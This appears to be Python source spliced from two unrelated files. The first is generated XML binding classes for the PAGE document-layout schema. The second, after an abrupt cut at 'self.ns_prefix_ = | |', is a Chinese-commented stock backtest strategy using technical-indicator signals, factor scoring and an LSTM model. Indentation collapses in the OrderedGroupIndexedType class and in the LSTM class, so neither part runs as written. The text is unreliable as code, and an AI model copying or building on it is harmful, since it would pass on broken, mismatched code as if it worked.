    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2010-03-19"', name_='ReadingOrderType', pretty_print=True):
        # Serialize this element (and its children) as XML to outfile.
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('ReadingOrderType')
        if imported_ns_def_ is not None:
            # An externally registered namespace definition takes precedence.
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'ReadingOrderType':
            # Re-emit under the tag name originally parsed from the document.
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ReadingOrderType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='ReadingOrderType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No child content: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='ReadingOrderType'):
        # ReadingOrderType defines no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2010-03-19"', name_='ReadingOrderType', fromsubclass_=False, pretty_print=True):
        # Serialize whichever root group is present.
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.OrderedGroup is not None:
            namespaceprefix_ = self.OrderedGroup_nsprefix_ + ':' if (UseCapturedNS_ and self.OrderedGroup_nsprefix_) else ''
            self.OrderedGroup.export(outfile, level, namespaceprefix_, namespacedef_='', name_='OrderedGroup', pretty_print=pretty_print)
        if self.UnorderedGroup is not None:
            namespaceprefix_ = self.UnorderedGroup_nsprefix_ + ':' if (UseCapturedNS_ and self.UnorderedGroup_nsprefix_) else ''
            self.UnorderedGroup.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UnorderedGroup', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        # Populate this object from an ElementTree node; returns self.
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            # Strip the namespace URI from the tag to get the local name.
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # ReadingOrderType defines no XML attributes.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # Dispatch each child element to the matching generated type.
        if nodeName_ == 'OrderedGroup':
            obj_ = OrderedGroupType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.OrderedGroup = obj_
            obj_.original_tagname_ = 'OrderedGroup'
        elif nodeName_ == 'UnorderedGroup':
            obj_ = UnorderedGroupType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.UnorderedGroup = obj_
            obj_.original_tagname_ = 'UnorderedGroup'
# end class ReadingOrderType
class RegionRefIndexedType(GeneratedsSuper):
    """Numbered regionPosition (order number) of this item within the current
    hierarchy level."""
    __hash__ = GeneratedsSuper.__hash__
    # Assign a class here to have factory() build that subclass instead.
    subclass = None
    superclass = None
    def __init__(self, index=None, regionRef=None, gds_collector_=None, **kwargs_):
        # Collector for parse-time messages (generateDS convention).
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = None
        # 'index' attribute (int): position within the current hierarchy level.
        self.index = _cast(int, index)
        self.index_nsprefix_ = None
        # 'regionRef' attribute: ID of the referenced region.
        self.regionRef = _cast(None, regionRef)
        self.regionRef_nsprefix_ = None
    def factory(*args_, **kwargs_):
        # Instantiate a registered override when a subclass module is active,
        # then the class-level 'subclass' hook, else RegionRefIndexedType.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, RegionRefIndexedType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if RegionRefIndexedType.subclass:
            return RegionRefIndexedType.subclass(*args_, **kwargs_)
        else:
            return RegionRefIndexedType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        # Accessor for the captured namespace prefix.
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        # Mutator for the captured namespace prefix.
        self.ns_prefix_ = ns_prefix
    def get_index(self):
        return self.index
    def set_index(self, index):
        self.index = index
    def get_regionRef(self):
        return self.regionRef
    def set_regionRef(self, regionRef):
        self.regionRef = regionRef
    def hasContent_(self):
        # Attribute-only element: the generated condition below is an empty
        # tuple, which is always falsy, so this never reports child content.
        if (
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2010-03-19"', name_='RegionRefIndexedType', pretty_print=True):
        # Serialize this element as XML to outfile (attributes only).
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('RegionRefIndexedType')
        if imported_ns_def_ is not None:
            # An externally registered namespace definition takes precedence.
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'RegionRefIndexedType':
            # Re-emit under the tag name originally parsed from the document.
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='RegionRefIndexedType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='RegionRefIndexedType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No child content: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='RegionRefIndexedType'):
        # Write the 'index' and 'regionRef' attributes, each at most once.
        if self.index is not None and 'index' not in already_processed:
            already_processed.add('index')
            outfile.write(' index="%s"' % self.gds_format_integer(self.index, input_name='index'))
        if self.regionRef is not None and 'regionRef' not in already_processed:
            already_processed.add('regionRef')
            outfile.write(' regionRef=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.regionRef), input_name='regionRef')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2010-03-19"', name_='RegionRefIndexedType', fromsubclass_=False, pretty_print=True):
        # RegionRefIndexedType has no child elements.
        pass
    def build(self, node, gds_collector_=None):
        # Populate this object from an ElementTree node; returns self.
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            # Strip the namespace URI from the tag to get the local name.
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Parse the 'index' (integer) and 'regionRef' (string) attributes.
        value = find_attr_value_('index', node)
        if value is not None and 'index' not in already_processed:
            already_processed.add('index')
            self.index = self.gds_parse_integer(value, node, 'index')
        value = find_attr_value_('regionRef', node)
        if value is not None and 'regionRef' not in already_processed:
            already_processed.add('regionRef')
            self.regionRef = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # RegionRefIndexedType has no child elements.
        pass
# end class RegionRefIndexedType
class OrderedGroupIndexedType(GeneratedsSuper):
"""Indexed group containing ordered elementsPosition (order number) of this
item within the current hierarchy level."""
__hash__ = GeneratedsSuper.__hash__
subclass = None
superclass = None
def __init__(self, id=None, index=None, RegionRefIndexed=None, OrderedGroupIndexed=None, UnorderedGroupIndexed=None, gds_collector_=None, **kwargs_):
    # Collector for parse-time messages (generateDS convention).
    self.gds_collector_ = gds_collector_
    self.gds_elementtree_node_ = None
    self.original_tagname_ = None
    self.parent_object_ = kwargs_.get('parent_object_')
    self.ns_prefix_ = None
    # 'id' attribute (string) and 'index' attribute (int) of this group.
    self.id = _cast(None, id)
    self.id_nsprefix_ = None
    self.index = _cast(int, index)
    self.index_nsprefix_ = None
    # Child element lists; default to fresh empty lists so instances never
    # share a mutable default.
    if RegionRefIndexed is None:
        self.RegionRefIndexed = []
    else:
        self.RegionRefIndexed = RegionRefIndexed
    self.RegionRefIndexed_nsprefix_ = None
    if OrderedGroupIndexed is None:
        self.OrderedGroupIndexed = []
    else:
        self.OrderedGroupIndexed = OrderedGroupIndexed
    self.OrderedGroupIndexed_nsprefix_ = None
    if UnorderedGroupIndexed is None:
        self.UnorderedGroupIndexed = []
    else:
        self.UnorderedGroupIndexed = UnorderedGroupIndexed
    self.UnorderedGroupIndexed_nsprefix_ = None
def factory(*args_, **kwargs_):
    # Instantiate a registered override when a subclass module is active,
    # then the class-level 'subclass' hook, else OrderedGroupIndexedType.
    if CurrentSubclassModule_ is not None:
        subclass = getSubclassFromModule_(
            CurrentSubclassModule_, OrderedGroupIndexedType)
        if subclass is not None:
            return subclass(*args_, **kwargs_)
    if OrderedGroupIndexedType.subclass:
        return OrderedGroupIndexedType.subclass(*args_, **kwargs_)
    else:
        return OrderedGroupIndexedType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
    # Accessor for the captured namespace prefix.
    return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = | |
# 导入所需的库
import pandas as pd
import numpy as np
import talib as tl
import tensorflow as tf
from sklearn.preprocessing import MinMaxScaler
# 股票策略模版
# 初始化函数,全局只运行一次
def init(context):
    """One-time strategy initialisation: configure the backtest, load quarterly
    fundamentals from CSV, and build one LSTM model (plus scaler) per stock.

    NOTE(review): relies on platform globals supplied by the backtesting
    framework (set_benchmark, log, set_commission, run_monthly, ...) — none
    are defined in this file.
    """
    set_benchmark('000300.SH')
    log.info('策略开始运行,初始化函数全局只运行一次')
    set_commission(PerShare(type='stock',cost=0.0002))
    set_slippage(PriceSlippage(0.005))
    set_volume_limit(0.25,0.5)
    set_params(context)  # strategy constants (indicator windows)
    set_variables(context)  # intermediate state (signal dict)
    context.n = 10  # max number of concurrent positions (used by trade_operation)
    context.SECURITT_SIZE = 30  # size of the candidate universe (NOTE(review): likely a typo for SECURITY_SIZE; kept as-is)
    context.TRADE_STOCK_SIZE = 10  # number of stocks kept after factor scoring
    run_monthly(update_trade_stocks,date_rule=1)
    # universe: stocks listed by 2005 and not delisted as of 2019
    context.securities = get_securities()[:context.SECURITT_SIZE]
    # quarterly financial data 2008-2016 (online fetch, disabled in favour of CSVs)
    #context.final_states = get_all_financial_statments(context.securities)
    # names of the factors (columns) used throughout
    context.factor_info = ['asharedebt_stat_equity_ratio_mrq','ashareoperate_stat_account_receive_turnover_ttm','ashareoperate_stat_accounts_payable_turnover_ttm','ashareoperate_stat_total_capital_turnover_ttm','ashareprofit_stat_net_sales_rate_ttm','asharevalue_stat_pb_mrq','asharevalue_stat_pe_ttm','asharevalue_stat_ps_ttm','asharevalue_stat_total_mv','balance_stat_accrued_wages','balance_stat_current_liabilities','balance_stat_fixed_asset','balance_stat_receivable_other','cashflow_sq_stat_net_increase_in_cce','growth_stat_ncf_of_oa_yoy','income_sq_stat_basic_eps','income_sq_stat_net_profit','income_sq_stat_overall_income','profit_sq_stat_roe_one_season']
    # load the 2008-2016 quarterly financial data from per-stock CSV files
    print("====== 获取季度财务数据中 ======")
    context.final_states = {}
    count = 0
    for stock in context.securities:
        count = count + 1
        context.final_states[stock] = pd.read_csv('fundamental_data/%s'%stock)[context.factor_info]
        if count%10 == 0:
            # progress indicator every 10 stocks
            print('(%d/%d)'%(count, len(context.securities)), end='\t')
    context.models = {}
    context.scalers = {}
    count = 0
    print("====== 模型训练中 ======")
    for stock in context.securities:
        count = count + 1
        context.models[stock] = LSTM(name_scope=stock, input_size=context.final_states[stock].shape[1], time_steps=4, epoches=1)
        # scale features into [0, 1] (NOTE(review): the original comment said
        # zero-mean/unit-variance, but MinMaxScaler performs min-max scaling)
        scaler = MinMaxScaler()
        context.final_states[stock] = scaler.fit_transform(context.final_states[stock])
        context.scalers[stock] = scaler
        # model training (disabled here; see LSTM.train)
        #context.models[stock].train(dataset=context.final_states[stock])
        if count%10 == 0:
            print('(%d/%d)'%(count,len(context.securities)))
## 开盘时运行函数, 用WR、RSI、OBV、PVT、BBI、VOSC技术指标进行量化择时
def handle_bar(context, bar_dict):
    """Per-bar handler: compute the combined technical signal for every
    candidate stock and trade on it.

    :param context: strategy context (holds trade_stocks and the signal dict)
    :param bar_dict: current bar data supplied by the platform

    Fix: trade_operation is executed inside the loop, once per stock, so every
    candidate is traded on its own signal (previously only the final loop
    variable could reach the trade step).
    """
    for stock in context.trade_stocks:
        # combined SMA/MACD/DMA/TRIX crossover signal, an int in [-4, 4]
        context.signal[stock] = stock_to_signals(context, bar_dict, stock)
        # act on this stock's signal immediately
        trade_operation(context, stock)
def update_trade_stocks(context, bar_dict):
    """Monthly task: refresh context.trade_stocks via factor scoring.

    Two triggers:
    - no current holdings: rebuild the pool immediately, deriving the last
      four reported quarters from today's date;
    - otherwise only at the start of a quarter (get_fundamentals_dates
      returns a non-empty list).
    For each candidate stock the last four quarters of factors are fetched,
    the next quarter is predicted with that stock's LSTM, and the pool is
    ranked by score_factors.

    NOTE(review): pd.DataFrame.append is deprecated (removed in pandas 2.0);
    the month->quarters logic below duplicates get_fundamentals_dates.
    """
    current_date = get_datetime()
    # with zero positions, re-select a fresh pool by factor scoring right away
    if len(list(context.portfolio.stock_account.positions.keys())) == 0:
        year = current_date.strftime('%Y')
        month = current_date.strftime('%m')
        print('year:',year,'\tmonth:',month)
        year = int(year)
        month = int(month)
        fundamental_dates = []
        # collect the four most recent completed quarters relative to today
        if month>=1 and month<=3:
            for season in ['q1','q2','q3','q4']:
                date = "%d%s" % (year-1, season)
                fundamental_dates.append(date)
        elif month>=4 and month<=6:
            for season in ['q2','q3','q4']:
                date = "%d%s" % (year-1, season)
                fundamental_dates.append(date)
            fundamental_dates.append("%dq1"%(year))
        elif month>=7 and month<=9:
            for season1 in ['q3','q4']:
                date = "%d%s" % (year-1, season1)
                fundamental_dates.append(date)
            for season2 in ['q1','q2']:
                date = "%d%s" % (year, season2)
                fundamental_dates.append(date)
        elif month>=10 and month<=12:
            fundamental_dates.append("%dq4"%(year-1))
            for season in ['q1','q2','q3']:
                date = "%d%s" % (year, season)
                fundamental_dates.append(date)
    else:
        # empty list unless today is the first month of a quarter
        fundamental_dates = get_fundamentals_dates(current_date)
    if fundamental_dates:
        # start of a new quarter: re-select the pool by factor scoring
        df_fundamental = pd.DataFrame(columns=context.factor_info)
        for stock in context.securities:
            # df accumulates the previous 4 quarters of factor data
            df = pd.DataFrame()
            q = get_fundamental_q(stock)
            for date in fundamental_dates:
                fundamental = get_fundamentals(query_object=q,statDate=date)
                if not fundamental.empty:
                    df = df.append(fundamental)
                else:
                    # placeholder NaN row for a quarter with no data
                    nan = np.zeros((1,))
                    nan[nan == 0] = np.nan
                    df = df.append(pd.DataFrame(nan))
            df = handle_stock_df(df)
            # predict the next quarter's factors with this stock's model
            stock_prediction = context.models[stock].predict(df.values)
            # prediction stays in scaled space (no inverse_transform applied)
            df_prediction = pd.DataFrame(stock_prediction, columns=context.factor_info)
            df_prediction.insert(0, 'stock', stock)
            df_fundamental = df_fundamental.append(df_prediction)
        df_fundamental = df_fundamental.reset_index(drop=True)
        # rank by factor score; keep the top TRADE_STOCK_SIZE as trade stocks
        context.trade_stocks = score_factors(df_fundamental, context.TRADE_STOCK_SIZE)
## ===================== 以下为功能函数 =======================
#1.设置策略参数
def set_params(context):
    """Attach the technical-indicator constants used by the signal functions."""
    constants = {
        'SMA_s': 4,          # SMA short window (days)
        'SMA_l': 40,         # SMA long window (days)
        'fastperiod': 12,    # MACD fast period
        'slowperiod': 26,    # MACD slow period
        'signalperiod': 9,   # MACD signal period
        'DMA_S': 4,          # DMA short window (days)
        'DMA_L': 40,         # DMA long window (days)
        'DMA_M': 20,         # DMA difference smoothing window
        'TRIX_N': 20,        # TRIX smoothing length N
        'TRIX_M': 60,        # TRIX moving-average length M
    }
    for name, value in constants.items():
        setattr(context, name, value)
#2.设置中间变量
def set_variables(context):
    """Initialise per-run state used by handle_bar."""
    context.signal = {}  # stock -> combined signal (original note: 1/0 = flat, 3 = buy — TODO confirm thresholds)
#4.计算SMA信号
def SMA_signal(context, bar_dict, stock):
    """Golden/dead-cross signal from short vs long simple moving averages.

    Returns 1 on a bullish crossover, -1 on a bearish crossover, 0 otherwise.
    """
    bars = history(stock, ['close'], 200, '1d', True, 'pre').dropna()
    closes = bars.close.values
    # short and long simple moving averages
    short = tl.SMA(closes, context.SMA_s)
    longer = tl.SMA(closes, context.SMA_l)
    crossed_up = short[-1] > short[-2] and short[-1] > longer[-1] and short[-2] < longer[-2]
    crossed_down = short[-1] < short[-2] and short[-1] < longer[-1] and short[-2] > longer[-2]
    if crossed_up:
        return 1
    if crossed_down:
        return -1
    return 0
#5.计算MACD信号
def MACD_signal(context, bar_dict, stock):
    """MACD (DIF/DEA) crossover signal: 1 bullish, -1 bearish, 0 otherwise."""
    bars = history(stock, ['close'], 200, '1d', True, 'pre').dropna()
    closes = bars.close.values
    # talib returns three series; keep the original unpacking order
    macd, dif, dea = tl.MACD(closes, context.fastperiod, context.slowperiod, context.signalperiod)
    bullish = dif[-1] > dif[-2] and dif[-1] > dea[-1] and dif[-2] < dea[-2] and dif[-1] > 0
    bearish = dif[-1] < dif[-2] and dif[-1] < dea[-1] and dif[-2] > dea[-2] and dif[-1] < 0
    return 1 if bullish else (-1 if bearish else 0)
#6.计算DMA信号
def DMA_signal(context, bar_dict, stock):
    """DMA/AMA crossover signal: 1 bullish, -1 bearish, 0 otherwise."""
    bars = history(stock, ['close'], 200, '1d', True, 'pre').dropna()
    closes = bars.close.values
    # DMA = short SMA minus long SMA; AMA = moving average of DMA
    diff = tl.SMA(closes, context.DMA_S) - tl.SMA(closes, context.DMA_L)
    avg = tl.SMA(diff, context.DMA_M)
    if diff[-1] > diff[-2] and diff[-1] > avg[-1] and diff[-2] < avg[-2]:
        return 1
    if diff[-1] < diff[-2] and diff[-1] < avg[-1] and diff[-2] > avg[-2]:
        return -1
    return 0
#7.计算TRIX信号
def TRIX_signal(context,bar_dict,stock):
    """TRIX/MATRIX crossover signal: 1 bullish, -1 bearish, 0 otherwise.

    NOTE(review): TRIX is conventionally built from triple *exponential*
    smoothing, but this implementation applies tl.SMA three times (the
    variables are still named EMA1/EMA2) — confirm whether SMA was intended.
    """
    value = history(stock,['close'],300,'1d',True,'pre')
    value = value.dropna()
    close = value.close.values
    # triple-smoothed close series
    EMA1 = tl.SMA(close,context.TRIX_N)
    EMA2 = tl.SMA(EMA1,context.TRIX_N)
    TR = tl.SMA(EMA2,context.TRIX_N)
    # TRIX = one-period rate of change of TR; MATTRIX = its moving average
    value['TR'] = TR
    value['TRIX'] = value.TR/value.TR.shift(1)-1.0
    TRIX = value.TRIX.values
    MATTRIX = tl.SMA(TRIX,context.TRIX_M)
    # crossover test on the last two bars
    if TRIX[-1]>TRIX[-2] and TRIX[-1]>MATTRIX[-1] and TRIX[-2]<MATTRIX[-2]:
        return 1
    elif TRIX[-1]<TRIX[-2] and TRIX[-1]<MATTRIX[-1] and TRIX[-2]>MATTRIX[-2]:
        return -1
    else:
        return 0
#8.计算交易信号
def stock_to_signals(context, bar_dict, stock):
    """Sum the four indicator crossover signals for *stock* (range -4..4)."""
    indicator_funcs = (SMA_signal, MACD_signal, DMA_signal, TRIX_signal)
    return sum(f(context, bar_dict, stock) for f in indicator_funcs)
#9.执行买卖操作
def trade_operation(context, stock):
    """Execute orders for *stock* based on its combined signal.

    A signal >= 1 buys, splitting available cash evenly across the remaining
    position slots (capped at context.n holdings); a signal <= -1 closes any
    open position in the stock.
    """
    signal = context.signal[stock]
    held = list(context.portfolio.stock_account.positions.keys())
    if signal >= 1 and len(held) < context.n:
        free_slots = context.n - len(held)
        order_value(stock, context.portfolio.stock_account.available_cash / free_slots)
    if signal <= -1 and stock in held:
        order_target(stock, 0)
# 筛选出2005年上市且2019年尚未退市的股票池,用于获取训练数据
def get_securities():
    """Build the training universe: stocks listed by 2005, still listed, and
    not ST-flagged for 30%+ of 2006-2014 trading days.

    NOTE(review): relies on platform helpers (get_all_securities,
    get_security_info, get_price).
    """
    # all A-share stocks
    univers = list(get_all_securities('stock').index)
    # keep stocks listed in/before 2005 whose delist year is the 2200 sentinel
    securities = []
    for stock in univers:
        info = get_security_info(stock)
        if info.start_date.strftime("%Y") <= '2005' and info.end_date.strftime("%Y") == '2200':
            securities.append(stock)
    # drop stocks ST on >= 30% of days (9 years x ~250 trading days)
    stock_list = []
    for stock in securities:
        # NOTE(review): summing the is_st field then indexing the result —
        # presumably yields the count of ST days; confirm against platform API
        st_days = np.sum(get_price(securities=stock, start_date='20060101', end_date='20141230', fields=['is_st']))['is_st']
        if st_days < 9*250*0.3:
            stock_list.append(stock)
    securities = stock_list
    return securities
def get_fundamental_q(stock):
    """Build the fundamentals query (19 factors) for a single stock.

    NOTE(review): query() and the asharevalue/balance/... table objects are
    globals supplied by the backtesting platform.
    """
    q = query(
        asharevalue.pe_ttm,  # P/E ratio (TTM)
        asharevalue.pb_mrq,  # P/B ratio (MRQ)
        asharevalue.ps_ttm,  # P/S ratio (TTM)
        profit_sq.roe_one_season,  # ROE (single quarter)
        income_sq.basic_eps,  # basic earnings per share
        asharevalue.total_mv,  # total market value
        ashareprofit.net_sales_rate_ttm,  # net profit margin on sales (TTM)
        asharedebt.equity_ratio_mrq,  # equity (debt-to-equity) ratio (MRQ)
        balance.fixed_asset,  # fixed assets
        #growth.net_asset_growth_ratio,  # net assets YoY growth (disabled)
        #profit_report.asset,  # total assets (disabled)
        #factor.opt_income_growth_ratio,  # operating revenue YoY growth (disabled)
        ashareoperate.account_receive_turnover_ttm,  # accounts receivable turnover (TTM)
        ashareoperate.accounts_payable_turnover_ttm,  # accounts payable turnover (TTM)
        ashareoperate.total_capital_turnover_ttm,  # total asset turnover (TTM)
        growth.ncf_of_oa_yoy,  # net operating cash flow, YoY growth
        income_sq.overall_income,  # total operating revenue
        #income_sq.overall_costs,  # total operating costs (disabled)
        income_sq.net_profit,  # net profit
        cashflow_sq.net_increase_in_cce,  # net increase in cash and cash equivalents
        #balance.long_term_receivables,  # long-term receivables (disabled)
        balance.receivable_other,  # other receivables
        #balance.total_non_current_assets,  # total non-current assets (disabled)
        balance.accrued_wages,  # payroll payable
        balance.current_liabilities  # total current liabilities
    ).filter(
        income_sq.symbol == stock)
    return q
def handle_stock_df(df):
    """Clean a per-stock fundamentals DataFrame.

    - fills NaNs in each column with that column's mean;
    - any remaining NaNs (e.g. fully-empty columns) become 0;
    - drops the placeholder column labelled 0 that appears when an empty
      quarter was appended as a bare ``pd.DataFrame(nan)``.

    :param df: raw fundamentals frame, possibly containing NaNs
    :returns: cleaned DataFrame

    Fixes: the chained ``df[col].fillna(..., inplace=True)`` pattern (which is
    unreliable/deprecated in modern pandas) is replaced with an explicit
    column assignment, and the bare ``except: pass`` around the column drop is
    replaced with an explicit membership check.
    """
    # mean-impute each column that has at least one missing value
    for column in list(df.columns[df.isnull().sum() > 0]):
        mean_val = df[column].mean()
        # an all-NaN column has a NaN mean; leave it for the zero-fill below
        if pd.notna(mean_val):
            df[column] = df[column].fillna(mean_val)
    df = df.fillna(0)
    # drop the placeholder column only when it is actually present
    if 0 in df.columns:
        df = df.drop(columns=[0])
    return df
# 获取08-16年,共36个季度的数据
def get_all_financial_statments(securities):
    """Fetch 36 quarters (2008q1-2016q4) of fundamentals for every stock.

    :param securities: iterable of stock codes
    :returns: dict stock -> cleaned DataFrame, one row per quarter (quarters
        with no data appear as a NaN row before handle_stock_df imputes them)

    NOTE(review): pd.DataFrame.append is deprecated (removed in pandas 2.0);
    the name keeps the original 'statments' spelling because callers use it.
    """
    years = [8,9,10,11,12,13,14,15,16]
    seasons = [1,2,3,4]
    stock_df_all = {}
    count = 0  # progress counter
    for stock in securities:
        count = count + 1
        if count%10 == 0:
            print(stock+'(%d/%d)'%(count, len(securities)), end='\t')
        df = pd.DataFrame()
        q = get_fundamental_q(stock)
        for year in years:
            for season in seasons:
                # e.g. '2008q1'
                date = '20%(year)02dq%(season)d'%{'year':year, 'season':season}
                fundamental = get_fundamentals(query_object=q, statDate=date)
                if fundamental.empty:
                    # placeholder NaN row for a quarter with no data
                    nan = np.zeros((1))
                    nan[nan == 0] = np.nan
                    df = df.append(pd.DataFrame(nan))
                else:
                    df = df.append(fundamental)
        df = handle_stock_df(df)
        df = df.reset_index(drop=True)
        stock_df_all[stock] = df
    return stock_df_all
# 判断当前日期是否为获取季度财务报表的日期
def get_fundamentals_dates(date):
    """Return the four completed quarters preceding *date*'s current quarter.

    Only the first month of each quarter (Jan/Apr/Jul/Oct) counts as a fetch
    date; for any other month an empty list is returned, which callers treat
    as "not a rebalancing date".

    :param date: a date/datetime object (anything with ``strftime``)
    :returns: list like ``['2014q2', '2014q3', '2014q4', '2015q1']``, or []

    Improvement: the four duplicated per-month branches are replaced by
    quarter arithmetic producing identical output.
    """
    year_str = date.strftime('%Y')
    month_str = date.strftime('%m')
    # keep the original debug print (zero-padded month, as before)
    print('year:', year_str, '\tmonth:', month_str)
    year = int(year_str)
    month = int(month_str)
    if month not in (1, 4, 7, 10):
        return []
    # k = completed quarters of the current year that precede this month
    k = (month - 1) // 3
    # last 4 quarters: tail of the previous year plus head of the current one
    return (['%dq%d' % (year - 1, q) for q in range(k + 1, 5)]
            + ['%dq%d' % (year, q) for q in range(1, k + 1)])
# 因子打分法选出股票池, 成长:估值:其他 = 5:3:2
def score_factors(df_fundamental, size):
    """Rank stocks by a weighted factor score; return the top *size* tickers.

    Weights follow growth : valuation : other = 5 : 3 : 2, with signs as in
    the original design (e.g. P/E, leverage and liabilities enter negatively).

    :param df_fundamental: one row per stock; must contain 'stock' plus the
        factor columns from context.factor_info
    :param size: number of top-scoring stocks to return
    :returns: list of stock codes, best score first

    A 'score' column is added to *df_fundamental* as a side effect (matching
    the original). Improvement: the scoring is vectorised over all rows
    instead of a per-row ``.iloc``/``.loc`` loop.
    """
    d = df_fundamental
    # growth factor: growth_stat_ncf_of_oa_yoy (weight 5)
    # valuation factors: pb, pe, ps, total_mv, net_sales_rate, equity_ratio (weight 3)
    # other fundamentals (weight 2)
    d['score'] = (
        5 * d['growth_stat_ncf_of_oa_yoy']
        + 3 * (d['asharevalue_stat_pb_mrq'] - d['asharevalue_stat_pe_ttm'] + d['asharevalue_stat_ps_ttm']
               + d['asharevalue_stat_total_mv'] - d['ashareprofit_stat_net_sales_rate_ttm'] - d['asharedebt_stat_equity_ratio_mrq'])
        + 2 * (d['profit_sq_stat_roe_one_season'] + d['income_sq_stat_basic_eps'] + d['income_sq_stat_net_profit'] + d['income_sq_stat_overall_income']
               + d['balance_stat_accrued_wages'] - d['balance_stat_current_liabilities'] + d['balance_stat_fixed_asset'] + d['balance_stat_receivable_other']
               - d['cashflow_sq_stat_net_increase_in_cce'] + d['ashareoperate_stat_account_receive_turnover_ttm']
               - d['ashareoperate_stat_accounts_payable_turnover_ttm'] - d['ashareoperate_stat_total_capital_turnover_ttm'])
    )
    # sort by score, best first, and keep the leading *size* stock codes
    ranked = d.sort_values(by='score', ascending=False)
    return list(ranked['stock'][:size])
## ========== 以下为LSTM模型 ==========
class LSTM():
def __init__(self, name_scope, input_size, time_steps, batch_size=16, hidden_units = 128, learning_rate=0.01, epoches=100):
    """One-step-ahead LSTM forecaster over factor vectors (TensorFlow 1.x graph API).

    :param name_scope: unique graph scope name (one model per stock)
    :param input_size: number of features per time step
    :param time_steps: input window length (quarters)
    :param batch_size: fixed batch size baked into the TF1 graph
    :param hidden_units: LSTM hidden-state size
    :param learning_rate: Adam learning rate
    :param epoches: number of training epochs
    """
    self.name_scope = name_scope
    self.input_size = input_size
    self.time_steps = time_steps
    self.hidden_units = hidden_units
    self.learning_rate = learning_rate
    self.batch_size = batch_size
    self.epoches = epoches
    # builds the TF1 graph, session and saver immediately
    self.NetInit()
def weight_variable(self, shape):
    """Return a TF variable initialised from a truncated normal (stddev 0.1)."""
    with tf.name_scope('weights'):
        return tf.Variable(tf.truncated_normal(shape, stddev=0.1), name='W')
def bias_variable(self, shape):
    """Return a TF bias variable initialised to the constant 0.1."""
    with tf.name_scope('biases'):
        return tf.Variable(tf.constant(0.1, shape=shape))
def NetInit(self):
    """Build the TF1 computation graph, session and checkpoint saver.

    Architecture: input projection -> single BasicLSTMCell -> output
    projection from the final hidden state; MSE loss trained with Adam.

    NOTE(review): uses TensorFlow 1.x-only APIs (tf.placeholder,
    tf.contrib.rnn, tf.Session) — incompatible with TF 2.x eager mode.
    """
    with tf.name_scope('Inputs'):
